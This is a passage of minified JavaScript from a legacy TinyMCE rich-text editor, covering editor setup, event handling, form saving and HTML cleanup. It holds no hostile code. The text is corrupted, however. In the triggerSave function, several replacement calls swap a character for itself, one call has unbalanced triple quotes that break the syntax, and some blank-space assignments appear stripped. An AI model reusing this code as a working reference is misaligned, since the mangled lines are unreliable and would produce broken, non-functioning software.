elm=doc.createElement("link");elm.rel="stylesheet";elm.href=css_file;if((headArr=doc.getElementsByTagName("head"))!=null&&headArr.length>0)headArr[0].appendChild(elm);}else var styleSheet=doc.createStyleSheet(css_file);};TinyMCE.prototype.confirmAdd=function(e,settings){var elm=tinyMCE.isMSIE?event.srcElement:e.target;var elementId=elm.name?elm.name:elm.id;tinyMCE.settings=settings;if(!elm.getAttribute('mce_noask')&&confirm(tinyMCELang['lang_edit_confirm']))tinyMCE.addMCEControl(elm,elementId);elm.setAttribute('mce_noask','true');};TinyMCE.prototype.updateContent=function(form_element_name){var formElement=document.getElementById(form_element_name);for(var n in tinyMCE.instances){var inst=tinyMCE.instances[n];if(!tinyMCE.isInstance(inst))continue;inst.switchSettings();if(inst.formElement==formElement){var doc=inst.getDoc();tinyMCE._setHTML(doc,inst.formElement.value);if(!tinyMCE.isMSIE)doc.body.innerHTML=tinyMCE._cleanupHTML(inst,doc,this.settings,doc.body,inst.visualAid);}}};TinyMCE.prototype.addMCEControl=function(replace_element,form_element_name,target_document){var id="mce_editor_"+tinyMCE.idCounter++;var inst=new TinyMCEControl(tinyMCE.settings);inst.editorId=id;this.instances[id]=inst;inst.onAdd(replace_element,form_element_name,target_document);};TinyMCE.prototype.triggerSave=function(skip_cleanup,skip_callback){for(var n in tinyMCE.instances){var inst=tinyMCE.instances[n];if(!tinyMCE.isInstance(inst))continue;inst.switchSettings();tinyMCE.settings['preformatted']=false;if(typeof(skip_cleanup)=="undefined")skip_cleanup=false;if(typeof(skip_callback)=="undefined")skip_callback=false;tinyMCE._setHTML(inst.getDoc(),inst.getBody().innerHTML);if(inst.settings['cleanup']==false){tinyMCE.handleVisualAid(inst.getBody(),true,false,inst);tinyMCE._setEventsEnabled(inst.getBody(),true);}tinyMCE._customCleanup(inst,"submit_content_dom",inst.contentWindow.document.body);var htm=skip_cleanup?inst.getBody().innerHTML:tinyMCE._cleanupHTML(inst,inst.getDoc(),this.settings,inst.getBody(),this.visualAid,true);htm=tinyMCE._customCleanup(inst,"submit_content",htm);if(tinyMCE.settings["encoding"]=="xml"||tinyMCE.settings["encoding"]=="html")htm=tinyMCE.convertStringToXML(htm);if(!skip_callback&&tinyMCE.settings['save_callback']!="")var content=eval(tinyMCE.settings['save_callback']+"(inst.formTargetElementId,htm,inst.getBody());");if((typeof(content)!="undefined")&&content!=null)htm=content;htm=tinyMCE.regexpReplace(htm,"(","(","gi");htm=tinyMCE.regexpReplace(htm,")",")","gi");htm=tinyMCE.regexpReplace(htm,";",";","gi");htm=tinyMCE.regexpReplace(htm,""",""","gi");htm=tinyMCE.regexpReplace(htm,"^","^","gi");if(inst.formElement)inst.formElement.value=htm;}};TinyMCE.prototype._setEventsEnabled=function(node,state){var events=new Array('onfocus','onblur','onclick','ondblclick','onmousedown','onmouseup','onmouseover','onmousemove','onmouseout','onkeypress','onkeydown','onkeydown','onkeyup');var evs=tinyMCE.settings['event_elements'].split(',');for(var y=0;y<evs.length;y++){var elms=node.getElementsByTagName(evs[y]);for(var i=0;i<elms.length;i++){var event="";for(var x=0;x<events.length;x++){if((event=tinyMCE.getAttrib(elms[i],events[x]))!=''){event=tinyMCE.cleanupEventStr(""+event);if(!state)event="return true;"+event;else event=event.replace(/^return true;/gi,'');elms[i].removeAttribute(events[x]);elms[i].setAttribute(events[x],event);}}}}};TinyMCE.prototype.resetForm=function(form_index){var formObj=document.forms[form_index];for(var n in tinyMCE.instances){var inst=tinyMCE.instances[n];if(!tinyMCE.isInstance(inst))continue;inst.switchSettings();for(var i=0;i<formObj.elements.length;i++){if(inst.formTargetElementId==formObj.elements[i].name){inst.getBody().innerHTML=formObj.elements[i].value;return;}}}};TinyMCE.prototype.execInstanceCommand=function(editor_id,command,user_interface,value,focus){var inst=tinyMCE.getInstanceById(editor_id);if(inst){if(typeof(focus)=="undefined")focus=true;if(focus)inst.contentWindow.focus();inst.autoResetDesignMode();this.selectedElement=inst.getFocusElement();this.selectedInstance=inst;tinyMCE.execCommand(command,user_interface,value);if(tinyMCE.isMSIE&&window.event!=null)tinyMCE.cancelEvent(window.event);}};TinyMCE.prototype.execCommand=function(command,user_interface,value){user_interface=user_interface?user_interface:false;value=value?value:null;if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();switch(command){case 'mceHelp':var template=new Array();template['file']='about.htm';template['width']=480;template['height']=380;tinyMCE.openWindow(template,{tinymce_version:tinyMCE.majorVersion+"."+tinyMCE.minorVersion,tinymce_releasedate:tinyMCE.releaseDate,inline:"yes"});return;case 'mceFocus':var inst=tinyMCE.getInstanceById(value);if(inst)inst.contentWindow.focus();return;case "mceAddControl":case "mceAddEditor":tinyMCE.addMCEControl(tinyMCE._getElementById(value),value);return;case "mceAddFrameControl":tinyMCE.addMCEControl(tinyMCE._getElementById(value),value['element'],value['document']);return;case "mceRemoveControl":case "mceRemoveEditor":tinyMCE.removeMCEControl(value);return;case "mceResetDesignMode":if(!tinyMCE.isMSIE){for(var n in tinyMCE.instances){if(!tinyMCE.isInstance(tinyMCE.instances[n]))continue;try{tinyMCE.instances[n].getDoc().designMode="on";}catch(e){}}}return;}if(this.selectedInstance){this.selectedInstance.execCommand(command,user_interface,value);}else if(tinyMCE.settings['focus_alert'])alert(tinyMCELang['lang_focus_alert']);};TinyMCE.prototype.eventPatch=function(editor_id){if(typeof(tinyMCE)=="undefined")return true;for(var i=0;i<document.frames.length;i++){try{if(document.frames[i].event){var event=document.frames[i].event;if(!event.target)event.target=event.srcElement;TinyMCE.prototype.handleEvent(event);return;}}catch(ex){}}};TinyMCE.prototype.unloadHandler=function(){tinyMCE.triggerSave(true,true);};TinyMCE.prototype.addEventHandlers=function(editor_id){if(tinyMCE.isMSIE){var doc=document.frames[editor_id].document;tinyMCE.addEvent(doc,"keypress",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"keyup",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"keydown",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"mouseup",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(doc,"click",TinyMCE.prototype.eventPatch);}else{var inst=tinyMCE.instances[editor_id];var doc=inst.getDoc();inst.switchSettings();tinyMCE.addEvent(doc,"keypress",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"keydown",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"keyup",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"click",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"mouseup",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"mousedown",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"focus",tinyMCE.handleEvent);tinyMCE.addEvent(doc,"blur",tinyMCE.handleEvent);eval('try { doc.designMode = "On"; } catch(e) {}');}};TinyMCE.prototype._createIFrame=function(replace_element){var iframe=document.createElement("iframe");var id=replace_element.getAttribute("id");var aw,ah;aw=""+tinyMCE.settings['area_width'];ah=""+tinyMCE.settings['area_height'];if(aw.indexOf('%')==-1){aw=parseInt(aw);aw=aw<0?300:aw;aw=aw+"px";}if(ah.indexOf('%')==-1){ah=parseInt(ah);ah=ah<0?240:ah;ah=ah+"px";}iframe.setAttribute("id",id);iframe.setAttribute("border","0");iframe.setAttribute("frameBorder","0");iframe.setAttribute("marginWidth","0");iframe.setAttribute("marginHeight","0");iframe.setAttribute("leftMargin","0");iframe.setAttribute("topMargin","0");iframe.setAttribute("width",aw);iframe.setAttribute("height",ah);iframe.setAttribute("allowtransparency","true");if(tinyMCE.settings["auto_resize"])iframe.setAttribute("scrolling","no");if(tinyMCE.isMSIE&&!tinyMCE.isOpera)iframe.setAttribute("src",this.settings['default_document']);iframe.style.width=aw;iframe.style.height=ah;if(tinyMCE.isMSIE&&!tinyMCE.isOpera)replace_element.outerHTML=iframe.outerHTML;else replace_element.parentNode.replaceChild(iframe,replace_element);if(tinyMCE.isMSIE)return window.frames[id];else return iframe;};TinyMCE.prototype.setupContent=function(editor_id){var inst=tinyMCE.instances[editor_id];var doc=inst.getDoc();var head=doc.getElementsByTagName('head').item(0);var content=inst.startContent;tinyMCE.operaOpacityCounter=100*tinyMCE.idCounter;inst.switchSettings();if(!tinyMCE.isMSIE&&doc.title!="blank_page"){try{doc.location.href=tinyMCE.baseURL+"/blank.htm";}catch(ex){}window.setTimeout("tinyMCE.setupContent('"+editor_id+"');",1000);return;}if(!head){window.setTimeout("tinyMCE.setupContent('"+editor_id+"');",10);return;}tinyMCE.importCSS(inst.getDoc(),tinyMCE.baseURL+"/themes/"+inst.settings['theme']+"/css/editor_content.css");tinyMCE.importCSS(inst.getDoc(),inst.settings['content_css']);tinyMCE.executeCallback('init_instance_callback','_initInstance',0,inst);if(tinyMCE.getParam("convert_fonts_to_spans"))inst.getDoc().body.setAttribute('id','mceSpanFonts');if(tinyMCE.settings['nowrap'])doc.body.style.whiteSpace="nowrap";doc.body.dir=this.settings['directionality'];doc.editorId=editor_id;if(!tinyMCE.isMSIE)doc.documentElement.editorId=editor_id;var base=doc.createElement("base");base.setAttribute('href',tinyMCE.settings['base_href']);head.appendChild(base);if(tinyMCE.settings['convert_newlines_to_brs']){content=tinyMCE.regexpReplace(content,"\r\n","<br />","gi");content=tinyMCE.regexpReplace(content,"\r","<br />","gi");content=tinyMCE.regexpReplace(content,"\n","<br />","gi");}content=tinyMCE._customCleanup(inst,"insert_to_editor",content);if(tinyMCE.isMSIE){window.setInterval('try{tinyMCE.getCSSClasses(document.frames["'+editor_id+'"].document, "'+editor_id+'");}catch(e){}',500);if(tinyMCE.settings["force_br_newlines"])document.frames[editor_id].document.styleSheets[0].addRule("p","margin: 0px;");var body=document.frames[editor_id].document.body;tinyMCE.addEvent(body,"beforepaste",TinyMCE.prototype.eventPatch);tinyMCE.addEvent(body,"beforecut",TinyMCE.prototype.eventPatch);body.editorId=editor_id;}content=tinyMCE.cleanupHTMLCode(content);if(!tinyMCE.isMSIE){var contentElement=inst.getDoc().createElement("body");var doc=inst.getDoc();contentElement.innerHTML=content;if(tinyMCE.isGecko&&tinyMCE.settings['remove_lt_gt'])content=content.replace(new RegExp('<>','g'),"");if(tinyMCE.settings['cleanup_on_startup'])tinyMCE.setInnerHTML(inst.getBody(),tinyMCE._cleanupHTML(inst,doc,this.settings,contentElement));else{content=tinyMCE.regexpReplace(content,"<strong","<b","gi");content=tinyMCE.regexpReplace(content,"<em(/?)>","<i$1>","gi");content=tinyMCE.regexpReplace(content,"<em ","<i ","gi");content=tinyMCE.regexpReplace(content,"</strong>","</b>","gi");content=tinyMCE.regexpReplace(content,"</em>","</i>","gi");tinyMCE.setInnerHTML(inst.getBody(),content);}inst.convertAllRelativeURLs();}else{if(tinyMCE.settings['cleanup_on_startup']){tinyMCE._setHTML(inst.getDoc(),content);eval('try {tinyMCE.setInnerHTML(inst.getBody(), tinyMCE._cleanupHTML(inst, inst.contentDocument, this.settings, inst.getBody());} catch(e) {}');}else tinyMCE._setHTML(inst.getDoc(),content);}var parentElm=document.getElementById(inst.editorId+'_parent');if(parentElm.lastChild.nodeName.toLowerCase()=="input")inst.formElement=parentElm.lastChild;else inst.formElement=parentElm.nextSibling;tinyMCE.handleVisualAid(inst.getBody(),true,tinyMCE.settings['visual'],inst);tinyMCE.executeCallback('setupcontent_callback','_setupContent',0,editor_id,inst.getBody(),inst.getDoc());if(!tinyMCE.isMSIE)TinyMCE.prototype.addEventHandlers(editor_id);if(tinyMCE.isMSIE)tinyMCE.addEvent(inst.getBody(),"blur",TinyMCE.prototype.eventPatch);tinyMCE.selectedInstance=inst;tinyMCE.selectedElement=inst.contentWindow.document.body;tinyMCE.triggerNodeChange(false,true);tinyMCE._customCleanup(inst,"insert_to_editor_dom",inst.getBody());tinyMCE._customCleanup(inst,"setup_content_dom",inst.getBody());tinyMCE._setEventsEnabled(inst.getBody(),false);tinyMCE.cleanupAnchors(inst.getDoc());if(tinyMCE.getParam("convert_fonts_to_spans"))tinyMCE.convertSpansToFonts(inst.getDoc());inst.startContent=tinyMCE.trim(inst.getBody().innerHTML);inst.undoLevels[inst.undoLevels.length]=inst.startContent;tinyMCE.operaOpacityCounter=-1;};TinyMCE.prototype.cleanupHTMLCode=function(s){s=s.replace(/<p\/>/gi,'<p> </p>');s=s.replace(/<p>\s*<\/p>/gi,'<p> </p>');s=s.replace(/<(h[1-6]|p|div|address|pre|form|table|li|ol|ul|td|b|em|strong|i|strike|u|span|a|ul|ol|li|blockquote)([^\\|>]*?)\/>/gi,'<$1$2></$1>');s=s.replace(new RegExp('\\s+></','gi'),'></');if(tinyMCE.isMSIE)s=s.replace(/<p><hr\/><\/p>/gi,"<hr>");s=s.replace(new RegExp('(href=\"?)(\\s*?#)','gi'),'$1'+tinyMCE.settings['document_base_url']+"#");return s;};TinyMCE.prototype.cancelEvent=function(e){if(tinyMCE.isMSIE){e.returnValue=false;e.cancelBubble=true;}else e.preventDefault();};TinyMCE.prototype.removeTinyMCEFormElements=function(form_obj){for(var i=0;i<form_obj.elements.length;i++){var elementId=form_obj.elements[i].name?form_obj.elements[i].name:form_obj.elements[i].id;if(elementId.indexOf('mce_editor_')==0)form_obj.elements[i].disabled=true;}};TinyMCE.prototype.accessibleEventHandler=function(e){var win=this._win;e=tinyMCE.isMSIE?win.event:e;var elm=tinyMCE.isMSIE?e.srcElement:e.target;if(elm.nodeName=="SELECT"&&!elm.oldonchange){elm.oldonchange=elm.onchange;elm.onchange=null;}if(e.keyCode==13||e.keyCode==32){elm.onchange=elm.oldonchange;elm.onchange();elm.oldonchange=null;tinyMCE.cancelEvent(e);}};TinyMCE.prototype.addSelectAccessibility=function(e,select,win){if(!select._isAccessible){select.onkeydown=tinyMCE.accessibleEventHandler;select._isAccessible=true;select._win=win;}};TinyMCE.prototype.handleEvent=function(e){if(typeof(tinyMCE)=="undefined")return true;switch(e.type){case "blur":if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.execCommand('mceEndTyping');return;case "submit":tinyMCE.removeTinyMCEFormElements(tinyMCE.isMSIE?window.event.srcElement:e.target);tinyMCE.triggerSave();tinyMCE.isNotDirty=true;return;case "reset":var formObj=tinyMCE.isMSIE?window.event.srcElement:e.target;for(var i=0;i<document.forms.length;i++){if(document.forms[i]==formObj)window.setTimeout('tinyMCE.resetForm('+i+');',10);}return;case "keypress":if(e.target.editorId){tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];}else{if(e.target.ownerDocument.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.ownerDocument.editorId];}if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();if(tinyMCE.isGecko&&tinyMCE.settings['force_p_newlines']&&e.keyCode==13&&!e.shiftKey){if(tinyMCE.selectedInstance._insertPara(e)){tinyMCE.execCommand("mceAddUndoLevel");tinyMCE.cancelEvent(e);return false;}}if(tinyMCE.isGecko&&tinyMCE.settings['force_p_newlines']&&(e.keyCode==8||e.keyCode==46)&&!e.shiftKey){if(tinyMCE.selectedInstance._handleBackSpace(e.type)){tinyMCE.execCommand("mceAddUndoLevel");e.preventDefault();return false;}}if(tinyMCE.isGecko&&(e.ctrlKey&&!e.altKey)&&tinyMCE.settings['custom_undo_redo']){if(tinyMCE.settings['custom_undo_redo_keyboard_shortcuts']){if(e.charCode==122){tinyMCE.selectedInstance.execCommand("Undo");e.preventDefault();return false;}if(e.charCode==121){tinyMCE.selectedInstance.execCommand("Redo");e.preventDefault();return false;}}if(e.charCode==98){tinyMCE.selectedInstance.execCommand("Bold");e.preventDefault();return false;}if(e.charCode==105){tinyMCE.selectedInstance.execCommand("Italic");e.preventDefault();return false;}if(e.charCode==117){tinyMCE.selectedInstance.execCommand("Underline");e.preventDefault();return false;}}if(tinyMCE.isMSIE&&tinyMCE.settings['force_br_newlines']&&e.keyCode==13){if(e.target.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];if(tinyMCE.selectedInstance){var sel=tinyMCE.selectedInstance.getDoc().selection;var rng=sel.createRange();if(tinyMCE.getParentElement(rng.parentElement(),"li")!=null)return false;e.returnValue=false;e.cancelBubble=true;rng.pasteHTML("<br />");rng.collapse(false);rng.select();tinyMCE.execCommand("mceAddUndoLevel");tinyMCE.triggerNodeChange(false);return false;}}if(e.keyCode==8||e.keyCode==46){tinyMCE.selectedElement=e.target;tinyMCE.linkElement=tinyMCE.getParentElement(e.target,"a");tinyMCE.imgElement=tinyMCE.getParentElement(e.target,"img");tinyMCE.triggerNodeChange(false);}return false;break;case "keyup":case "keydown":if(e.target.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];else return;if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();var inst=tinyMCE.selectedInstance;if(tinyMCE.isGecko&&tinyMCE.settings['force_p_newlines']&&(e.keyCode==8||e.keyCode==46)&&!e.shiftKey){if(tinyMCE.selectedInstance._handleBackSpace(e.type)){tinyMCE.execCommand("mceAddUndoLevel");e.preventDefault();return false;}}tinyMCE.selectedElement=null;tinyMCE.selectedNode=null;var elm=tinyMCE.selectedInstance.getFocusElement();tinyMCE.linkElement=tinyMCE.getParentElement(elm,"a");tinyMCE.imgElement=tinyMCE.getParentElement(elm,"img");tinyMCE.selectedElement=elm;if(tinyMCE.isGecko&&e.type=="keyup"&&e.keyCode==9)tinyMCE.handleVisualAid(tinyMCE.selectedInstance.getBody(),true,tinyMCE.settings['visual'],tinyMCE.selectedInstance);if(tinyMCE.isGecko&&tinyMCE.settings['document_base_url']!=""+document.location.href&&e.type=="keyup"&&e.ctrlKey&&e.keyCode==86)tinyMCE.selectedInstance.fixBrokenURLs();if(tinyMCE.isMSIE&&e.type=="keydown"&&e.keyCode==13)tinyMCE.enterKeyElement=tinyMCE.selectedInstance.getFocusElement();if(tinyMCE.isMSIE&&e.type=="keyup"&&e.keyCode==13){var elm=tinyMCE.enterKeyElement;if(elm){var re=new RegExp('^HR|IMG|BR$','g');var dre=new RegExp('^H[1-6]$','g');if(!elm.hasChildNodes()&&!re.test(elm.nodeName)){if(dre.test(elm.nodeName))elm.innerHTML=" ";else elm.innerHTML=" ";}}}var keys=tinyMCE.posKeyCodes;var posKey=false;for(var i=0;i<keys.length;i++){if(keys[i]==e.keyCode){posKey=true;break;}}if(tinyMCE.isMSIE&&tinyMCE.settings['custom_undo_redo']){var keys=new Array(8,46);for(var i=0;i<keys.length;i++){if(keys[i]==e.keyCode){if(e.type=="keyup")tinyMCE.triggerNodeChange(false);}}if(tinyMCE.settings['custom_undo_redo_keyboard_shortcuts']){if(e.keyCode==90&&(e.ctrlKey&&!e.altKey)&&e.type=="keydown"){tinyMCE.selectedInstance.execCommand("Undo");tinyMCE.triggerNodeChange(false);}if(e.keyCode==89&&(e.ctrlKey&&!e.altKey)&&e.type=="keydown"){tinyMCE.selectedInstance.execCommand("Redo");tinyMCE.triggerNodeChange(false);}if((e.keyCode==90||e.keyCode==89)&&(e.ctrlKey&&!e.altKey)){e.returnValue=false;e.cancelBubble=true;return false;}}}if(!posKey&&e.type=="keyup")tinyMCE.execCommand("mceStartTyping");if(e.type=="keyup"&&(posKey||e.ctrlKey))tinyMCE.execCommand("mceEndTyping");if(posKey&&e.type=="keyup")tinyMCE.triggerNodeChange(false);if(tinyMCE.isMSIE&&e.ctrlKey)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);break;case "mousedown":case "mouseup":case "click":case "focus":if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();var targetBody=tinyMCE.getParentElement(e.target,"body");for(var instanceName in tinyMCE.instances){if(!tinyMCE.isInstance(tinyMCE.instances[instanceName]))continue;var inst=tinyMCE.instances[instanceName];inst.autoResetDesignMode();if(inst.getBody()==targetBody){tinyMCE.selectedInstance=inst;tinyMCE.selectedElement=e.target;tinyMCE.linkElement=tinyMCE.getParentElement(tinyMCE.selectedElement,"a");tinyMCE.imgElement=tinyMCE.getParentElement(tinyMCE.selectedElement,"img");break;}}if(tinyMCE.isSafari){tinyMCE.selectedInstance.lastSafariSelection=tinyMCE.selectedInstance.getBookmark();tinyMCE.selectedInstance.lastSafariSelectedElement=tinyMCE.selectedElement;var lnk=tinyMCE.getParentElement(tinyMCE.selectedElement,"a");if(lnk&&e.type=="mousedown"){lnk.setAttribute("mce_real_href",lnk.getAttribute("href"));lnk.setAttribute("href","javascript:void(0);");}if(lnk&&e.type=="click"){window.setTimeout(function(){lnk.setAttribute("href",lnk.getAttribute("mce_real_href"));lnk.removeAttribute("mce_real_href");},10);}}if(e.type!="focus")tinyMCE.selectedNode=null;tinyMCE.triggerNodeChange(false);tinyMCE.execCommand("mceEndTyping");if(e.type=="mouseup")tinyMCE.execCommand("mceAddUndoLevel");if(!tinyMCE.selectedInstance&&e.target.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];if(tinyMCE.isGecko&&tinyMCE.settings['document_base_url']!=""+document.location.href)window.setTimeout('tinyMCE.getInstanceById("'+inst.editorId+'").fixBrokenURLs();',10);return false;break;}};TinyMCE.prototype.switchClass=function(element,class_name,lock_state){var lockChanged=false;if(typeof(lock_state)!="undefined"&&element!=null){element.classLock=lock_state;lockChanged=true;}if(element!=null&&(lockChanged||!element.classLock)){element.oldClassName=element.className;element.className=class_name;}};TinyMCE.prototype.restoreAndSwitchClass=function(element,class_name){if(element!=null&&!element.classLock){this.restoreClass(element);this.switchClass(element,class_name);}};TinyMCE.prototype.switchClassSticky=function(element_name,class_name,lock_state){var element,lockChanged=false;if(!this.stickyClassesLookup[element_name])this.stickyClassesLookup[element_name]=document.getElementById(element_name);element=this.stickyClassesLookup[element_name];if(typeof(lock_state)!="undefined"&&element!=null){element.classLock=lock_state;lockChanged=true;}if(element!=null&&(lockChanged||!element.classLock)){element.className=class_name;element.oldClassName=class_name;if(tinyMCE.isOpera){if(class_name=="mceButtonDisabled"){var suffix="";if(!element.mceOldSrc)element.mceOldSrc=element.src;if(this.operaOpacityCounter>-1)suffix='?rnd='+this.operaOpacityCounter++;element.src=tinyMCE.baseURL+"/themes/"+tinyMCE.getParam("theme")+"/images/opacity.png"+suffix;element.style.backgroundImage="url('"+element.mceOldSrc+"')";}else{if(element.mceOldSrc){element.src=element.mceOldSrc;element.parentNode.style.backgroundImage="";element.mceOldSrc=null;}}}}};TinyMCE.prototype.restoreClass=function(element){if(element!=null&&element.oldClassName&&!element.classLock){element.className=element.oldClassName;element.oldClassName=null;}};TinyMCE.prototype.setClassLock=function(element,lock_state){if(element!=null)element.classLock=lock_state;};TinyMCE.prototype.addEvent=function(obj,name,handler){if(tinyMCE.isMSIE){obj.attachEvent("on"+name,handler);}else obj.addEventListener(name,handler,false);};TinyMCE.prototype.submitPatch=function(){tinyMCE.removeTinyMCEFormElements(this);tinyMCE.triggerSave();this.mceOldSubmit();tinyMCE.isNotDirty=true;};TinyMCE.prototype.onLoad=function(){for(var c=0;c<tinyMCE.configs.length;c++){tinyMCE.settings=tinyMCE.configs[c];var selector=tinyMCE.getParam("editor_selector");var deselector=tinyMCE.getParam("editor_deselector");var elementRefAr=new Array();if(document.forms&&tinyMCE.settings['add_form_submit_trigger']&&!tinyMCE.submitTriggers){for(var i=0;i<document.forms.length;i++){var form=document.forms[i];tinyMCE.addEvent(form,"submit",TinyMCE.prototype.handleEvent);tinyMCE.addEvent(form,"reset",TinyMCE.prototype.handleEvent);tinyMCE.submitTriggers=true;if(tinyMCE.settings['submit_patch']){try{form.mceOldSubmit=form.submit;form.submit=TinyMCE.prototype.submitPatch;}catch(e){}}}}var mode=tinyMCE.settings['mode'];switch(mode){case "exact":var elements=tinyMCE.getParam('elements','',true,',');for(var i=0;i<elements.length;i++){var element=tinyMCE._getElementById(elements[i]);var trigger=element?element.getAttribute(tinyMCE.settings['textarea_trigger']):"";if(tinyMCE.getAttrib(element,"class").indexOf(deselector)!=-1)continue;if(trigger=="false")continue;if(tinyMCE.settings['ask']&&element){elementRefAr[elementRefAr.length]=element;continue;}if(element)tinyMCE.addMCEControl(element,elements[i]);else if(tinyMCE.settings['debug'])alert("Error: Could not find element by id or name: "+elements[i]);}break;case "specific_textareas":case "textareas":var nodeList=document.getElementsByTagName("textarea");for(var i=0;i<nodeList.length;i++){var elm=nodeList.item(i);var trigger=elm.getAttribute(tinyMCE.settings['textarea_trigger']);if(selector!=''&&tinyMCE.getAttrib(elm,"class").indexOf(selector)==-1)continue;if(tinyMCE.getAttrib(elm,"class").indexOf(deselector)!=-1)continue;if((mode=="specific_textareas"&&trigger=="true")||(mode=="textareas"&&trigger!="false"))elementRefAr[elementRefAr.length]=elm;}break;}for(var i=0;i<elementRefAr.length;i++){var element=elementRefAr[i];var elementId=element.name?element.name:element.id;if(tinyMCE.settings['ask']){if(tinyMCE.isGecko){var settings=tinyMCE.settings;tinyMCE.addEvent(element,"focus",function(e){window.setTimeout(function(){TinyMCE.prototype.confirmAdd(e,settings);},10);});}else{var settings=tinyMCE.settings;tinyMCE.addEvent(element,"focus",function(){TinyMCE.prototype.confirmAdd(null,settings);});}}else tinyMCE.addMCEControl(element,elementId);}if(tinyMCE.settings['auto_focus']){window.setTimeout(function(){var inst=tinyMCE.getInstanceById(tinyMCE.settings['auto_focus']);inst.selectNode(inst.getBody(),true,true);inst.contentWindow.focus();},10);}tinyMCE.executeCallback('oninit','_oninit',0);}};TinyMCE.prototype.removeMCEControl=function(editor_id){var inst=tinyMCE.getInstanceById(editor_id);if(inst){inst.switchSettings();editor_id=inst.editorId;var html=tinyMCE.getContent(editor_id);var tmpInstances=new Array();for(var instanceName in tinyMCE.instances){var instance=tinyMCE.instances[instanceName];if(!tinyMCE.isInstance(instance))continue;if(instanceName!=editor_id)tmpInstances[instanceName]=instance;}tinyMCE.instances=tmpInstances;tinyMCE.selectedElement=null;tinyMCE.selectedInstance=null;var replaceElement=document.getElementById(editor_id+"_parent");var oldTargetElement=inst.oldTargetElement;var targetName=oldTargetElement.nodeName.toLowerCase();if(targetName=="textarea"||targetName=="input"){replaceElement.parentNode.removeChild(replaceElement);oldTargetElement.style.display="inline";oldTargetElement.value=html;}else{oldTargetElement.innerHTML=html;replaceElement.parentNode.insertBefore(oldTargetElement,replaceElement);replaceElement.parentNode.removeChild(replaceElement);}}};TinyMCE.prototype._cleanupElementName=function(element_name,element){var name="";element_name=element_name.toLowerCase();if(element_name=="body")return null;if(tinyMCE.cleanup_verify_html){for(var i=0;i<tinyMCE.cleanup_invalidElements.length;i++){if(tinyMCE.cleanup_invalidElements[i]==element_name)return null;}var validElement=false;var elementAttribs=null;for(var i=0;i<tinyMCE.cleanup_validElements.length&&!elementAttribs;i++){for(var x=0,n=tinyMCE.cleanup_validElements[i][0].length;x<n;x++){var elmMatch=tinyMCE.cleanup_validElements[i][0][x];if(elmMatch.charAt(0)=='+'||elmMatch.charAt(0)=='-')elmMatch=elmMatch.substring(1);if(elmMatch.match(new RegExp('\\*|\\?|\\+','g'))!=null){elmMatch=elmMatch.replace(new RegExp('\\?','g'),'(\\S?)');elmMatch=elmMatch.replace(new RegExp('\\+','g'),'(\\S+)');elmMatch=elmMatch.replace(new RegExp('\\*','g'),'(\\S*)');elmMatch="^"+elmMatch+"$";if(element_name.match(new RegExp(elmMatch,'g'))){elementAttribs=tinyMCE.cleanup_validElements[i];validElement=true;break;}}if(element_name==elmMatch){elementAttribs=tinyMCE.cleanup_validElements[i];validElement=true;element_name=elementAttribs[0][0];break;}}}if(!validElement)return null;}if(element_name.charAt(0)=='+'||element_name.charAt(0)=='-')name=element_name.substring(1);if(!tinyMCE.isMSIE){if(name=="strong"&&!tinyMCE.cleanup_on_save)element_name="b";else if(name=="em"&&!tinyMCE.cleanup_on_save)element_name="i";}var elmData=new Object();elmData.element_name=element_name;elmData.valid_attribs=elementAttribs;return elmData;};TinyMCE.prototype._moveStyle=function(elm,style,attrib){if(tinyMCE.cleanup_inline_styles){var val=tinyMCE.getAttrib(elm,attrib);if(val!=''){val=''+val;switch(attrib){case "background":val="url('"+val+"');";break;case "bordercolor":if(elm.style.borderStyle==''||elm.style.borderStyle=='none')elm.style.borderStyle='solid';break;case "border":case "width":case "height":if(attrib=="border"&&elm.style.borderWidth>0)return;if(val.indexOf('%')==-1)val+='px';break;case "vspace":case "hspace":elm.style.marginTop=val+"px";elm.style.marginBottom=val+"px";elm.removeAttribute(attrib);return;case "align":if(elm.nodeName=="IMG"){if(tinyMCE.isMSIE)elm.style.styleFloat=val;else elm.style.cssFloat=val;}else elm.style.textAlign=val;elm.removeAttribute(attrib);return;}if(val!=''){eval('elm.style.'+style+' = val;');elm.removeAttribute(attrib);}}}else{if(style=='')return;var val=eval('elm.style.'+style)==''?tinyMCE.getAttrib(elm,attrib):eval('elm.style.'+style);val=val==null?'':''+val;switch(attrib){case "background":if(val.indexOf('url')==-1&&val!='')val="url('"+val+"');";if(val!=''){elm.style.backgroundImage=val;elm.removeAttribute(attrib);}return;case "border":case "width":case "height":val=val.replace('px','');break;case "align":if(tinyMCE.getAttrib(elm,'align')==''){if(elm.nodeName=="IMG"){if(tinyMCE.isMSIE&&elm.style.styleFloat!=''){val=elm.style.styleFloat;style='styleFloat';}else if(tinyMCE.isGecko&&elm.style.cssFloat!=''){val=elm.style.cssFloat;style='cssFloat';}}}break;}if(val!=''){elm.removeAttribute(attrib);elm.setAttribute(attrib,val);eval('elm.style.'+style+' = "";');}}};TinyMCE.prototype._cleanupAttribute=function(valid_attributes,element_name,attribute_node,element_node){var attribName=attribute_node.nodeName.toLowerCase();var attribValue=attribute_node.nodeValue;var attribMustBeValue=null;var verified=false;if(attribName.indexOf('moz_')!=-1)return null;if(!tinyMCE.isMSIE&&(attribName=="mce_real_href"||attribName=="mce_real_src")){if(!tinyMCE.cleanup_on_save){var attrib=new 